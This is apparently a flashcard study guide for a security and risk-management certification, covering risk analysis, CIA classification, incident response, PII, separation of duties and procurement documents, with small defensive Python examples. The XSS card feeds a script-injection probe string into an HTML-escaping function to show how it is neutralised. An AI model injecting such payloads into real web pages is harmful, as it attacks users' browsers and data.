What is the risk impact of de-perimeterization (a constantly changing network boundary) on an organization?
Security boundaries are usually established by a set of systems under a single administrative control. These boundaries are found at different levels, and vulnerabilities can become exposed as data crosses each one. A key consideration is an enterprise standard operating environment (SOE) vs. allowing individually managed devices on corporate networks. A Standard Operating Environment (SOE) is an industry term that…
Show answer and Breakdown
Answer:
describes a standard implementation of an operating system and its associated software. It is typically installed as a standard disk image that can be deployed to many computers in an organization. It can include the base operating system, a custom configuration, standard applications used within an organization, software updates, and service packs. An SOE can cover servers, desktops, laptops, thin clients, and mobile devices. The main benefit of an SOE in a business environment is reduced cost and time to deploy, configure, manage, and support computers. By standardizing the hardware and software platforms used within an organization, the IT department or service provider can bring up new computers and resolve problems with existing computers quickly. A standardized, reusable, and automated solution creates a known, predictable, and supportable environment, ensuring known outcomes with speed and repeatability.
Implementing a Risk Mitigation Strategy
Things to consider when implementing a risk mitigation strategy.
When risks and their associated priorities are known, the next step is establishing a formulated strategy for mitigating the risks in a cost-effective manner. Mitigation methods should give…
Show answer and Breakdown
Answer:
consideration to cost, time to implement, success rate, completeness, and impact on the complete accounting of known risks. A risk mitigation strategy should always conform to the business context and should evaluate what the organization can afford, implement, and understand. It should also clearly define validation techniques that can be used to show that risks are being properly mitigated. Factors to be aware of include financial investment measures such as estimated cost takeout, ROI (return on investment), effectiveness in terms of dollar impact, and percentage of risk coverage.
Classify information types into levels of CIA based on organization / industry
Common information classifications based on CIA.
Information Security Attributes: Confidentiality, Integrity, and Availability (CIA). Information systems consist of three main portions: hardware, software, and communications. The purpose is to identify and apply…
Show answer and Breakdown
Answer:
information security industry standards, as methods of protection and prevention, at three levels: Physical, personal, and organizational. Processes and policies are implemented to inform people (administrators, users, and operators) how to properly apply products to preserve information security within the organizations. The type of information security classification labels chosen and applied is based on the organization’s environment, such as: In the business sector, labels such as: Public, Sensitive, Private, and Confidential. In the government sector, labels such as: Unclassified, Sensitive But Unclassified, Restricted, Confidential, Secret, and Top Secret and their non-English equivalents. In cross-sectoral formations, the Traffic Light Protocol, which consists of: White, Green, Amber, and Red.
Aggregate CIA Scores and Security Controls
Determine the aggregate score of CIA and the security controls required based on the score.
Determine the aggregate score of CIA: The aggregate CIA score assesses the effects on Confidentiality, Integrity, and Availability; the aggregate score will be listed as low, moderate, or high. Determine the minimum required security controls based on the aggregate score: Security controls are…
Show answer and Breakdown
Answer:
tactics or counteragents to avoid, counteract, or diminish security risks. To help measure or develop security controls, they can be qualified by several criteria, such as how quickly they respond relative to a security incident. Information security controls safeguard the confidentiality, integrity, and/or availability of information (the so-called CIA Triad). In many cases, additional categories such as non-repudiation and accountability are included, depending on how narrowly or broadly the CIA Triad is defined.
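A minimal Python sketch of the FIPS 199 "high water mark" idea, where the aggregate rating is simply the highest of the individual confidentiality, integrity, and availability impact levels:

    # Map qualitative impact levels to ranks so they can be compared.
    LEVELS = {"low": 1, "moderate": 2, "high": 3}

    def aggregate_cia(confidentiality: str, integrity: str, availability: str) -> str:
        # The aggregate score is the highest individual impact level.
        return max((confidentiality, integrity, availability), key=LEVELS.__getitem__)

    # A system with moderate confidentiality impact, low integrity impact,
    # and high availability impact is treated as a high-impact system.
    print(aggregate_cia("moderate", "low", "high"))   # high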
Conducting System Specific Risk Analysis and Steps Required
Overview and the steps taken in conducting system specific risk analysis.
Conduct system-specific risk analysis: Risk analysis gives higher management the specifics required to ascertain and understand the risks that…
Show answer and Breakdown
Answer:
should be mitigated, transferred, or accepted. It identifies risks, quantifies the aftereffects of threats, and supports budgeting for security. It aligns the requirements and objectives of the security policy with the business objectives and motives. The stages of risk analysis are: inventory, threat assessment, evaluation of controls, management, and monitoring.
What is Risk Determination?
How to define risk determination.
Risk determination is the process of perception and identification of new risk parameters or…
Show answer and Breakdown
Answer:
new relationships among existing risk parameters, or observation of a shift in the magnitudes of existing risk parameters. It also includes the related methods of risk identification and risk evaluation. Risk determination is mandatory for every project manager, and its techniques have their advantages and disadvantages.
Magnitude of Impact Model for Risk Analysis
Know the Magnitude of Impact Model for risk assessment.
Magnitude of Impact. High: Exercise of the vulnerability – May result in significant loss of major tangible assets or resources. – May extensively violate, damage, or disrupt an organization's mission, reputation, or interests/investments. – May result in human death or critical injury.
Show answer and Breakdown
Answer:
Medium: Exercise of the vulnerability – May result in the significant loss of tangible assets or resources. – May violate, harm, or disrupt an organization's mission, reputation, or interests/investments. – May result in human injury. Low: Exercise of the vulnerability – May result in the loss of some tangible assets or resources. – May noticeably affect an organization's mission, reputation, or interests.
Vulnerability Plausibility Rating, Factors and Levels
What are the factors of a plausibility rating, and what are the three levels of a rating?
To arrive at an overall plausibility rating, used to identify the probability that a potential vulnerability may be exercised within the construct of the associated threat environment, these principal factors should be considered: threat-source motivation and capability; nature of the vulnerability; existence and effectiveness of current controls. The three levels (likelihood) of plausibility are…
Show answer and Breakdown
Answer:
The three levels of plausibility (or likelihood): High: In this level, the threat-source is highly motivated and sufficiently capable, and controls to prevent the vulnerability from being exercised are ineffective. Medium: In this level, the threat-source is motivated and capable, but controls are in place that may impede successful exercise of the vulnerability. Low: In this level, the threat-source lacks motivation or capability, or controls are in place to prevent, or at least significantly impede, the vulnerability from being exercised.
Decision Process for Security Control Application
How to decide which security controls you should apply.
Risks fall into three main categories: controllable known, uncontrollable known, and unknown. For the first two, one must have…
Show answer and Breakdown
Answer:
knowledge of the risks before one can determine how to manage them. This is done using root cause analysis, whose objective is to identify the root cause of the problem and solve it as quickly as possible. Kendrick briefly discusses the use of fishbone diagrams as a technique to facilitate this process. Unknown risks should be handled the same way, though necessarily only as they occur.
The Four Methods of Handling Risk
What are the four ways risk may be handled?
Avoid: Take action to avoid the risk.
Transfer: Have someone else assume the risk, e.g. by purchasing insurance.
Show answer and Breakdown
Answer:
Mitigate: Take action to reduce the risk to an acceptable level. Accept: Identify the risk as acceptable and let it happen.
How to Effectively Implement Security / Risk Controls
What are the steps involved in properly implementing security / risk controls?
Once the proper control measures available to manage the hazards and minimize risks in the workplace have been identified, the next task is putting these controls in place. This involves the activities necessary to allow the identified measures to operate effectively. Effective implementation typically includes the development of an implementation plan. Items that should be included:
Show answer and Breakdown
Answer:
- Specify the preferred control options
- Set out the steps that need to be taken to implement the control measures
- Identify and allocate the resources necessary to implement the control measures (time and expenses)
- Allocate responsibilities and accountabilities (who does what and when)
- Set the timeframe for implementation (expected time for completion)
- Set a date for reviewing the control measures
What is Enterprise Security Architecture (ESA) Framework?
Briefly define and describe the important points of an Enterprise Security Architecture (ESA) Framework for security governance.
ESA Framework: a framework for architecture modeling of KPI-driven enterprise business applications. Characteristics include:
Show answer and Breakdown
Answer:
- Organizations use KPIs to measure the effectiveness and efficiency of business processes
- Some KPI measurement happens after the fact, while other measurement happens during the execution of a business process (to raise alarms/automatic escalations)
- Organizations want to continuously fine-tune and improve the business process in response to KPI measurements
- Organizations are interested in KPIs that span multiple business processes
Continuous Monitoring and Why it is Important
What is continuous monitoring and why is it important?
Continuous monitoring in any system begins after initial system security authorization. It entails monitoring any…
Show answer and Breakdown
Answer:
changes to the information system that occur over time and measures the cumulative impact of those changes on system security. Because hardware, software, and firmware change during the lifetime of an information system, the effects of these changes must be examined to determine whether corresponding changes to the security controls are needed to sustain the system at the desired security state.
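One common continuous-monitoring activity is detecting configuration drift against a recorded baseline. Below is a minimal Python sketch of that idea; the watched paths and the baseline file format are illustrative assumptions, not part of any prescribed monitoring standard.

```python
# Detect configuration drift by comparing file hashes to a saved baseline.
import hashlib
import json
from pathlib import Path

WATCHED = ["/etc/ssh/sshd_config", "/etc/passwd"]  # assumed example paths

def sha256_of(path: str) -> str:
    """Hash a file's contents so any change is detectable."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def build_baseline(paths, out="baseline.json"):
    Path(out).write_text(json.dumps({p: sha256_of(p) for p in paths}))

def check_drift(baseline_file="baseline.json"):
    baseline = json.loads(Path(baseline_file).read_text())
    for path, expected in baseline.items():
        if sha256_of(path) != expected:
            # A detected change should trigger a review of whether the
            # security controls still hold the desired security state.
            print(f"CHANGE DETECTED: {path}")
```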
The Importance of Preparing for and Supporting Incident Response
Explain the importance of preparing for and supporting the incident response and recovery process.
Organizations are reliant on IT systems to manage their enterprise. Availability of these systems has become vital for the smooth operation of a company, and in some cases the economy as a whole, making the…
Show answer and Breakdown
Answer:
continued operation of the business a very critical issue. Any disruption of service or compromised data can have a significant impact, particularly financially, on an organization if there is loss of customer confidence. Incident response is a systematic approach to handling the aftermath of a security breach or attack (also known as an incident). The main objective is to manage the situation as efficiently as possible to reduce damage or disruption of business processes and to minimize recovery time as well as cost. An incident response plan includes a policy that outlines, in specific terms, what constitutes an incident and details the protocol that should be followed when an incident occurs.
What is E-Discovery?
Explain the concept of e-Discovery or electronic discovery.
Electronic Discovery or E-Discovery is the discovery process in civil litigation concerned with the exchange of information electronically. Usually a digital forensics analysis is done for…
Show answer and Breakdown
Answer:
recovering evidence. A variety of experts are involved in electronic discovery, leading to problems with confusing terminology. Data is qualified as relevant by legal representatives and placed on legal hold. Evidence is then obtained and examined using digital forensic methods, and is usually converted into PDF or TIFF format for use in court.
What is Electronic Inventory and Asset Control
Explain the concept of electronic inventory and asset control.
Electronic inventory is a critical aspect of business operation. Keeping and storing inventory can be costly, and a company that finds a way to efficiently manage its…
Show answer and Breakdown
Answer:
inventory has an advantage over its competitors. Asset control is the set of business practices that connect financial, contractual, and inventory functions to sustain life-cycle management and strategic decision making for the IT environment. Assets include all components of software and hardware found in the business environment.
Data Retention Policies
Describe the use of data retention policies.
Data retention policies are created to outline the procedures of persistent data and records management for satisfying legal and business data archival requirements. A data retention policy is applied to weigh…
Show answer and Breakdown
Answer:
legal and privacy issues against economics and need-to-know concerns to determine the retention time, archival rules, data formats, and the permissible means of storage, access, and encryption.
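To make the idea of a retention schedule concrete, here is a minimal Python sketch. The record classes and retention periods are illustrative assumptions only; actual periods come from legal and business requirements, and records under legal hold must never be purged.

```python
# Apply a data retention schedule: decide whether a record has outlived
# its retention period. Periods below are invented for illustration.
from datetime import datetime, timedelta

RETENTION = {                       # record class -> retention period
    "email": timedelta(days=365 * 2),
    "financial": timedelta(days=365 * 7),
    "access_logs": timedelta(days=90),
}

def is_expired(record_class, created, now=None):
    """True if the record may be purged (assuming no legal hold)."""
    now = now or datetime.utcnow()
    return now - created > RETENTION[record_class]

print(is_expired("access_logs", datetime(2023, 1, 1)))  # True
```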
What is Data Recovery?
Describe the principles of data recovery.
Data recovery is the process of recovering data from damaged, failed, corrupted, or inaccessible secondary storage media when it cannot be retrieved normally. Data is often recovered from…
Show answer and Breakdown
Answer:
storage media such as internal or external hard disk drives, solid-state drives (SSDs), USB flash drives, storage tapes, CDs, DVDs, RAID arrays, and other devices. Data salvage may be required due to physical damage to the storage device or logical damage to the file system that prevents it from being mounted by the host operating system.
Mitigation of Vulnerability or Breach Risk
What three steps are involved in mitigating vulnerability or data breach risk?
The following three steps should be taken to mitigate the risk of vulnerability or data breach:
Show answer and Breakdown
Answer:
Take an inventory of PHI/PII: An inventory gives a complete accounting of every aspect of personally identifiable information (PII) and PHI that an organization holds, in either paper or electronic format. Develop an Incident Response Plan (IRP): An IRP is an effective, cost-efficient means of helping organizations meet HIPAA and HITECH requirements and develop guidelines related to data breach incidents. Review contracts and agreements with business associates: Business associates are an increasing factor in data breaches, so contracts between organizations and business associates need to be kept up to date. Furthermore, the following precautions should be added to your organization’s security program:
- Utilize an encryption system
- Place controls on data storage and access
- Regulate use of portable devices and storage media
- Carefully dispose of outdated equipment and records
- Keep a backup set of records off-site
What is a Data Breach?
Define a data breach.
A data breach is the intended or unintended release of secure information into an untrusted environment. Incidents vary from a concentrated attack by black hats with the assistance of organized crime or national governments to…
Show answer and Breakdown
Answer:
sloppy disposal of computer equipment or data storage media. A data breach is a security incident in which highly sensitive or confidential data is copied, transmitted, viewed, or stolen by an unauthorized agent. Financial information such as credit card or bank details, personal health information (PHI), personally identifiable information (PII), and corporate trade secrets or intellectual property are common targets of data breaches.
The Role of Incident Response and its Relation to Incident Handling and Management
What is incident response, and how does it relate to incident handling and incident management?
Incident response is a process that discovers a problem, finds its cause, minimizes the damages, corrects the problem, and documents each step of response for future reference. One of the main objectives of incident response is to “freeze the scene”. There’s an interconnection between incident response, incident handling, and incident management. The key goal of incident handling is to…
Show answer and Breakdown
Answer:
contain and fix any damage caused by an event and to suspend any further damage. Incident management administers the overall process of an incident by officially declaring the incident and preparing documentation and post-mortem assessments after the incident has occurred.
The Importance of a Privacy Policy in Data Protection
What is a privacy policy and how does using one help to mitigate data breach risk within an organization?
A privacy policy is an aspect of security policy. It deals with privacy and the protection of customer and supplier information. This policy supports and strengthens trust between…
Show answer and Breakdown
Answer:
the organization and external entities. Because the external entities’ information could be highly confidential, it is critical that the organization show its respect for this information. It might include contracts, sales documents, financial data, or personally identifiable information. If the information is corrupted, stolen, or exposed by an unauthorized party, the organization can respond with legal action against the violator for infringing on their privacy policy.
The Difference Between Security Policy and Privacy Policy
How does a security policy differ from a privacy policy?
Security policy is a detailed description of what it means to be secure for a system, organization or other entity. For an organization, it deals with the parameters of behavior of its members as well as restrictions imposed on adversaries or unauthorized persons by mechanisms such as doors, locks, keys, and walls. For systems, the security policy specifically deals with…
Show answer and Breakdown
Answer:
restrictions on functions and the flow of information among them, restrictions on access by external systems and persons (including programs), and restrictions on access to data by people. A privacy policy is an official statement or legal document (privacy law) that conveys some or all of the ways a party gathers, uses, discloses, and manages a customer or client’s data. Personal information is anything that can be used to identify an individual, including: name, address, date of birth, marital status, contact information, ID issue and expiry dates, financial records, credit information, and medical history.
Factors that Determine the Need for Policy Development
Factors that define the need for policy development.
A policy is typically described as a principle or rule intended to guide and clarify decisions and achieve rational outcomes. The term does not normally convey specific tactics; those are normally referred to as procedure or protocol. Policies are ratified by the senior governance body within an organization, while procedures are developed and adopted by senior executive officers. Policies can aid both subjective and objective decision making. Policies that aid in subjective decision making would…
Show answer and Breakdown
Answer:
usually guide senior management with decisions that must weigh the relative benefits of a number of factors, which are often difficult to measure objectively, before making official decisions; establishing a work-life balance policy is one example. Policies that aid in objective decision making are usually operational in nature and can be objectively tested, such as a password policy. The process of policy development starts with acknowledging the need for written policy. Often a board or superintendent must address a decision that would be easier to make if a policy existed. The board is not alone in determining policy needs: parents, students, teachers, local taxpayers, the superintendent, the state or federal government, and pressure groups are all involved with policy issues and problems.
Process Simulation
What is process simulation and what is it generally intended for?
Process simulation is implemented in the design, development, analysis, and optimization of technical processes and is generally applied to…
Show answer and Breakdown
Answer:
chemical plants and chemical processes, but also to power stations, and similar technical facilities. Process development consists of process research and innovation; scale-up; design, construction and operation of pilot plant or laboratory units; technology transfer; and optimization of manufacturing processes.
Legal Compliance Solution
What is a Legal Compliance Solution?
A Legal Compliance Solution is a collection of specialized courseware designed to address an organization’s compliance training needs. Legal Governance, Risk Management, and Compliance, or “LGRC”, entails the…
Show answer and Breakdown
Answer:
complex set of procedures, rules, mechanisms, and systems used by corporate legal departments to develop, implement, and monitor a blended approach to business problems. While Governance, Risk Management, and Compliance pertains to a generalized set of tools for maintaining a corporation or company, Legal GRC, or LGRC, refers to a specialized but similar set of tools utilized by attorneys, corporate legal departments, general counsel, and law firms to monitor themselves and their corporations, especially in law-related matters.
Business Documents to Support Security, ISA and MOU
Certain business documents help mitigate risk within an organization. Examples include Interconnection Security Agreement (ISA) and a Memorandum of Understanding (MOU). How do these contribute to security?
Interconnection Security Agreement (ISA): An Interconnection Security Agreement (ISA) is a contractual agreement between the organizations that own and operate connected IT systems to document the technical requirements of the interconnection. The ISA keeps both partnering organizations in sync with one another’s technical requirements and helps define liability in the event of negligence. The ISA also supports a Memorandum of Understanding or Agreement (MOU/A) between the organizations.
Show answer and Breakdown
Answer:
Memorandum of Understanding (MOU): A memorandum of understanding (MOU) is a document that outlines a bilateral or multilateral understanding between parties. This document expresses a convergence of will between the parties, stating a proposed common line of action.
What is Personally Identifiable Information (PII)?
It is important to understand what exactly constitutes Personally Identifiable Information (PII) and what technically does not qualify as PII.
Personally Identifiable Information (PII), as used in information security, applies to information that can be used to uniquely identify, contact, or locate an individual or can be integrated with other sources to uniquely identify a single individual. The abbreviation PII is widely understood, but the phrase it abbreviates has…
Show answer and Breakdown
Answer:
four common variants based on personal, personally, identifiable, and identifying. Not all variants are interpreted identically; the definitions vary with the jurisdiction and the purposes for which the term is being applied. The US government used the phrase “personally identifiable information” in 2007 in a memorandum from the Executive Office of the President, Office of Management and Budget (OMB), and that terminology now appears in US standards such as the NIST Guide to Protecting the Confidentiality of Personally Identifiable Information. The OMB memorandum defines PII as information which can be used to distinguish or trace an individual’s identity, such as their name, social security number, or biometric records, either alone or when combined with other personal or identifying information which is linked or linkable to a specific individual, such as date and place of birth, mother’s maiden name, etc.
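As a hedged illustration of how organizations begin locating PII in practice, here is a small Python sketch that flags potential US-style identifiers in free text. Real PII discovery requires far more than pattern matching (context, validation, and jurisdiction-specific rules); the regular expressions here are illustrative assumptions only.

```python
# Flag *potential* PII in text with simple regular expressions.
# Patterns are illustrative and will produce false positives/negatives.
import re

PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "phone": re.compile(r"\b\d{3}[-.]\d{3}[-.]\d{4}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
}

def flag_pii(text):
    """Return a dict of pattern name -> matches found in the text."""
    hits = {}
    for name, rx in PATTERNS.items():
        found = rx.findall(text)
        if found:
            hits[name] = found
    return hits

print(flag_pii("Contact: jane@example.com, SSN 123-45-6789"))
```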
What is Separation of Duties (SoD)?
What is the concept of Separation of Duties (SoD), and how does it play a role in security as a “policy that contains”?
Separation of duties (SoD) is the concept of having more than one individual charged to complete a task. It is also referred to as segregation of duties or, in the political realm, separation of powers. It is a “policy that contains”. Segregation of duties assists in…
Show answer and Breakdown
Answer:
minimizing the potential damage from the actions of one person. The IS or end-user department should be organized in a way that supports adequate separation of duties. According to ISACA’s Segregation of Duties Control matrix, certain duties should not be combined into one position. This matrix is not an industry standard, but rather a suggestion about which positions should be separated and which require shared controls when combined.
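A minimal sketch of enforcing SoD in code follows. The duty names and conflicting pairs are illustrative assumptions, not entries from ISACA’s matrix; the point is simply that no single user should hold both halves of a conflicting pair.

```python
# Separation-of-duties check: flag a user whose assigned duties include
# a conflicting pair (e.g., requesting and approving the same action).

CONFLICTING_DUTIES = {
    ("request_payment", "approve_payment"),
    ("develop_code", "deploy_to_production"),
}

def violates_sod(user_duties):
    """True if one user's duty set contains a conflicting pair."""
    return any(a in user_duties and b in user_duties
               for a, b in CONFLICTING_DUTIES)

assert violates_sod({"develop_code", "deploy_to_production"})
assert not violates_sod({"develop_code", "approve_payment"})
```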
Job Rotation
What is job rotation and why is it helpful to organizations?
Job rotation is an approach to management development where an individual is taken through a schedule of…
Show answer and Breakdown
Answer:
assignments designed to give him or her broad exposure to the entire operation. Job rotation is performed in order to give qualified employees the opportunity to gain more insight into the processes of a company and to increase job satisfaction through job variation.
Mandatory Vacation
Explain the policy of mandatory vacation and why it may benefit an organization.
Mandatory vacations are required vacations imposed on employees for their professional benefit. These vacations ensure…
Show answer and Breakdown
Answer:
personal time employees should have within the working cycle. Preventing burnout is important to sustain the expected level of productivity that would otherwise be impacted by an overworked employee, so mandatory vacations help ensure that employees are effective when on duty. From a security standpoint, mandatory vacations also give an organization a window in which to detect fraud or policy violations that an employee could conceal only by never leaving their duties.
Least Privilege / Minimal Privilege
What is least privilege / minimal privilege?
The principle of least privilege, also referred to as the principle of minimal privilege or just least privilege, necessitates that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program based on the layer and given functions) must have…
Show answer and Breakdown
Answer:
access to only the information and resources necessary for its legitimate purpose. When applied to users, the terms “least user access” and “least-privileged user account” (LUA) are also used, conveying the concept that all users at all times should run with as few privileges as possible, and should launch applications with minimized privileges.
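A common process-level application of this principle is to hold elevated privileges only for the single operation that needs them, then drop them permanently. Here is a minimal POSIX-oriented Python sketch; the service account name "svc-web" is an illustrative assumption.

```python
# Least privilege at the process level: start privileged only long enough
# to bind a low-numbered port, then permanently drop to an unprivileged
# account. POSIX-only (uses the pwd module); run initially as root.
import os
import pwd
import socket

def bind_then_drop(port=80, run_as="svc-web"):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))      # ports < 1024 require root
    info = pwd.getpwnam(run_as)
    os.setgid(info.pw_gid)         # drop group first, then user;
    os.setuid(info.pw_uid)         # the drop is one-way by design
    return s                       # continue serving with minimal rights
```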
How to Use Trend Analysis to Mitigate Risk and Improve Security
How can trend analysis help mitigate risk and improve operational, ongoing security for an organization?
Trend Analysis is the practice of gathering information and attempting to identify a pattern, or trend, in the information. In some fields of study, the term “trend analysis” is more formal in application and meaning. Although trend analysis is often used to anticipate future events, it can also be used to measure uncertain events of the past such as “how many ancient kings probably ruled between two dates, based on data such as the average years which other known kings reigned.” Here is how to Enact / Use Trend Analysis:
Show answer and Breakdown
Answer:
Perform on-going research: On-going research helps examine and measure industry trends and determine their potential impact on the enterprise. It helps the organization move from complexity to simplicity and serves as a guide to finding best practices for doing new things. Identify new technology: On-going research is also a very important element for successfully managing a project and taking it in a progressive direction most efficiently, and it helps identify new technologies that may continually improve security.
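As a hedged sketch of trend analysis applied to operational security, the snippet below compares a short moving average of a security metric (for example, failed logins per day) against a longer baseline. The window sizes and alert factor are illustrative assumptions.

```python
# Spot an upward trend in a daily security metric by comparing a short
# moving average to a longer-term baseline. Thresholds are illustrative.

def moving_average(values, window):
    recent = values[-window:]
    return sum(recent) / len(recent)

def trending_up(daily_counts, short=7, long=30, factor=1.5):
    """True if the recent average is well above the longer baseline."""
    return moving_average(daily_counts, short) > \
           factor * moving_average(daily_counts, long)

history = [20] * 25 + [55, 60, 58, 62, 70]   # sudden rise at the end
print(trending_up(history))                   # -> True: investigate
```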
Technology Evolution, Internet Standards, ISO and RFC’s
How is technology evolution standardized? What roles are played by the International Organization for Standardization (ISO) and Requests for Comments (RFCs)?
A Request for Comments (RFC) is a document proposed by an autonomous body to outline the Internet suite of protocols and related experiments. All Internet standards are written as RFCs, and these documents are unusual in that they are not formally reviewed, established, and advocated by organizations like the American National Standards Institute (ANSI). Here are the categorical descriptions of RFCs that indicate their status within the Internet standardization process:
- Informational: An informational RFC can be nearly anything, ranging from April 1 jokes and proprietary protocols to widely recognized essential RFCs like RFC 1591. Some informational RFCs form the “For Your Information” (FYI) subseries.
- Experimental: An experimental RFC can be an IETF document or an individual submission to the RFC Editor. In theory it is considered experimental; in practice some documents are never advanced to the standards track because no one volunteers to take them through the process.
- Best current practice: The best current practice (BCP) subseries gathers administrative documents and other texts that are regarded as official rules, not merely informational, but that do not affect over-the-wire data. The border between the standards track and BCP is often ambiguous. If a document only affects the Internet Standards Process, like BCP 9, or IETF administration, it is clearly a BCP. If it only defines rules and regulations for Internet Assigned Numbers Authority (IANA) registries, the case is less clear; most of these documents are BCPs, but some are on the standards track.
Show answer and Breakdown
Answer:
- Historic: A historic RFC is one that has been rendered obsolete by an updated version, documents a protocol that is no longer considered interesting on the current Internet, or has been removed from the standards track for other reasons. Some obsolete RFCs are not categorized as historic because the Internet standards process generally does not allow normative references from a standards-track RFC to another RFC with lower status.
- Unknown: Status unknown is used for some very old RFCs, where it is unclear which status the document would receive if it were published today. Some of these RFCs would not be published at all; an early RFC was often just that: a simple request for comments, not intended to define a protocol, administrative procedure, or anything else for which the RFC series is used today.
The International Organization for Standardization, commonly known as ISO, is an international standard-setting body made up of representatives from various national standards organizations. Founded on 23 February 1947 and headquartered in Geneva, Switzerland, the organization promulgates worldwide proprietary industrial and commercial standards. Though the organization describes itself as non-governmental, its standards often become law, either through treaties or national standards, giving it more power than most non-governmental organizations. In practice, ISO acts as a consortium with substantial connections to governments.
What is Situational Awareness?
Describe situational awareness and its importance in management and risk.
Situational awareness is the perception of environmental elements with respect to time and/or space, the comprehension of their meaning, and the projection of their status after some variable has changed, such as time. Situational awareness is a…
Show answer and Breakdown
Answer:
tool used to enhance awareness of what is happening in the vicinity and to understand how information, events, and one’s personal actions will affect goals and objectives, both presently and in the long term. Having complete, accurate, and up-to-date situational awareness is especially important where the technological and situational complexity facing the human decision-maker is a concern.
What are Client-Side Attacks?
Describe the nature of a client-side attack and provide a modern example.
Attacks targeted at individual client computers are called client-side attacks. These are usually directed at web browsers and instant-messaging applications. Since most organizations invest resources…
Show answer and Breakdown
Answer:
in defending against server-side attacks, and client systems aren’t commonly fortified the way server systems are, client-side attacks are easier targets with an increased chance of succeeding. Cross-site scripting (XSS) is a form of client-side attack in which the culprit injects client-side script into web pages viewed by other users. Web browser security is intended to block a script from one site from running while the user is visiting another site; unfortunately, flaws allow specially crafted web pages to bypass such restrictions. Cross-site scripting grants an attacker access to data from other sites (such as logon information), lets them inject data into forms, and lets them instruct the browser to download and install content as if it originated from the trusted site rather than from the corrupted one. Filtering data entered by users is the main technique for blocking XSS attacks: administrators must remove or disable script tags and other “actionable” content that could request remote scripts.
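The main defense described above, neutralizing user-supplied markup before it reaches the page, can be shown in a few lines of Python using the standard library. This is a minimal sketch of output escaping, not a complete XSS defense (real applications also need context-aware encoding and input validation).

```python
# Escape user-supplied data before placing it into HTML, so injected
# markup is rendered as inert text instead of executed as script.
import html

def render_comment(user_input):
    # html.escape converts <, >, &, and quotes into harmless entities.
    return f"<p class='comment'>{html.escape(user_input, quote=True)}</p>"

print(render_comment("<script>alert('xss')</script>"))
# -> <p class='comment'>&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;</p>
```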
What are Threats?
Describe a threat.
A threat is an act of intimidation in which some action is proposed in order to trigger a negative response. It communicates hostile…
Show answer and Breakdown
Answer:
intent to cause harm or loss to an individual. In many jurisdictions, threats are considered crimes under certain circumstances. Threat displays (intimidation) are also common in the animal kingdom, often in ritualized form.
What is Global Information Architecture?
Describe Global Information Architecture (Global IA).
Global Information Architecture is needed to define the major information categories used within an enterprise and their relationships to business operations. It is vital for guiding…
Show answer and Breakdown
Answer:
applications development and handling the integration and sharing of data. Information architecture is associated with other infrastructure issues as well as software development and data resources. An infrastructure cannot be effective if data is dispersed throughout the network without a plan; likewise, software can neither integrate across functions nor be distributed across networks without a clear plan. Information architecture offers a method for coordinating these activities by defining the major information categories used within an enterprise and their relationships to business operations. A business that does not implement a global information architecture is more susceptible to various kinds of attackers, because its data and controls lack a coherent plan.
What is a Request for Proposal (RFP)?
What is a Request for Proposal (RFP)?
A request for proposal (RFP) is a procurement document that requests solutions, ideas, and detailed information from the vendor about the outsourced function; the vendor supplies a proposal in response to the RFP. An RFP is typically issued with a statement of work that specifies the outsourcing need for which the vendor will propose a solution and a price. A request for proposal (RFP) is…
Show answer and Breakdown
Answer:
a document used to seek out proposals from prospective sellers, which typically entail a significant amount of negotiation. Case example: an agency wants to automate its work practices, so it issues an RFP inviting prospective sellers to respond with proposals. Sellers might propose various hardware, software, and networking solutions to align with the agency’s needs. Writing a solid RFP is an important part of procurement planning, and legal requirements are often involved in issuing RFPs and reviewing proposals, particularly for government projects, so it can be especially useful to confer with experts familiar with procurement planning. To make sure the RFP contains the information required to provide the basis for a good proposal, the buying organization should ask these questions: Can the seller develop a good proposal based on the information in the RFP? Can the seller determine detailed pricing and schedule information based on the RFP?
What is a Request for Quote (RFQ)?
What is a Request for Quote (RFQ)?
A request for quote (RFQ) is a procurement document that you (the buyer) submit to the vendor. The RFQ requests a price from the vendor for the specified work, product, or service. As opposed to an RFP, an RFQ is a document used to draw quotes or bids, requiring little negotiation, from…
Show answer and Breakdown
Answer:
prospective sellers for commodity products. Case example: the government wants to purchase 100 personal computers with specific features, so it submits an RFQ to potential sellers. RFQs don’t require as much time to prepare as RFPs, nor does the process of soliciting responses. All procurement documents should be written to yield accurate and complete responses from prospective sellers. They should include background information about the entity and the stated project, the associated statement of work, a schedule, a description of the desired form of response, evaluation criteria, pricing forms, and any required contractual provisions. They should also be detailed enough to assure consistent, comparable responses, yet flexible enough to allow consideration of seller suggestions for better ways to meet the requirements.
What is a Request for Information (RFI)?
Describe a Request for Information (RFI).
A request for information (RFI) is a document used to solicit information about prospective sellers well before an RFP or RFQ is issued. A buyer uses…
Show answer and Breakdown
Answer:
an RFI in order to examine the landscape of sellers that could potentially bid at a future juncture. An RFI typically precedes an RFP or RFQ by several months.
What is an Agreement?
What is an agreement?
An agreement is an understanding or meeting of minds between two or more legally competent parties, about their respective duties and rights regarding current or future performance. When people share a viewpoint or…
Show answer and Breakdown
Answer:
notion about something, they agree. Sometimes it is prudent to include a written statement about what has been agreed upon. This is an agreement. Agreements are common in law and business. For example, when a person hires someone to perform a scope of work, an agreement is usually signed so everyone is clear about what must be done and within what time frame.
What is Benchmarking?
What is benchmarking / best practice benchmarking / process benchmarking?
Benchmarking is also known as Best Practice Benchmarking or Process Benchmarking. It is a method used in management, and especially in strategic management, in which an organization compares its business processes and performance metrics, including cost, cycle time, productivity, and quality, against those of another organization commonly regarded as an industry-standard benchmark or best practice. It gives organizations…
Show answer and Breakdown
Answer:
insight for developing plans to adopt best practices, usually with the goal of enhancing some aspect of performance. Benchmarking may be a one-time event, though it is commonly treated as an ongoing process in which organizations continually challenge their own practices.
Why Use Prototypes and Testing
Why do organizations use prototyping?
The following are purposes for creating a prototype or using multiple test environments:
Show answer and Breakdown
Answer:
- It reduces initial project risks within a business organization.
- It helps verify some of the application requirements that are not clearly defined by a user.
- It confirms technology recommendations for an application.
- It reduces the gap between what a developer has defined for the application architecture and what business management has understood.
- It also reduces the gap between what a user has defined for an application requirement or scenario and what a developer has defined in the application development.
Cost Benefit Analysis and How to Perform One
What is Cost Benefit Analysis and what is the process involved in performing one?
